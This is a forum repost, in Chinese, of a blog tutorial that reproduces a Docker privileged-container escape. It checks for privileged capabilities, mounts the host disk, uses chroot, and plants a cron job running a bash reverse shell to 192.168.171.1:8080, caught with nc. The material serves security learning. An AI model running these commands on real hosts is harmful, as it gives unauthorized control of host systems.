[docker逃逸] Privileged 特权模式逃逸复现

海哥  金牌会员 | 2025-1-17 09:27:30 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 879|帖子 879|积分 2637

本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
简述

在 Docker 中,Privileged 特权模式赋予容器几乎与宿主机相同的权限,允许其访问全部设备和内核功能。这种模式虽然提供了灵活性,但也带来了安全风险,可能导致容器逃逸,即攻击者从容器内获取宿主机权限。
环境设置

以特权模式创建容器
  1. docker pull centos
  2. docker run -itd --privileged centos /bin/bash
复制代码

查看当前是否为docker环境:
  1. cat /proc/1/cgroup|grep docker
复制代码

systemd-detect-virt 也可以判断当前是否为容器
  1. systemd-detect-virt
复制代码

查看当前是否为特权模式
  1. capsh --print
复制代码
  1. cat /proc/self/status | grep CapEff
复制代码

CapEff为0000001fffffffff,当前容器为特权模式。
复现

使用lsblk查看磁盘

挂载宿主机根目录
  1. mkdir test
  2. mount /dev/sds3 test
复制代码
挂载成功

使用chroot切换根目录,方便进行筹划任务反弹shell
  1. chroot test
复制代码

创建筹划任务
  1. crontab -e
复制代码
  1. */1 * * * *  /bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.171.1/8080 0>&1"
复制代码

攻击机监听反弹shell,成功反弹了宿主机的shell
  1. nc -lvvp 8080
复制代码


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

海哥

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表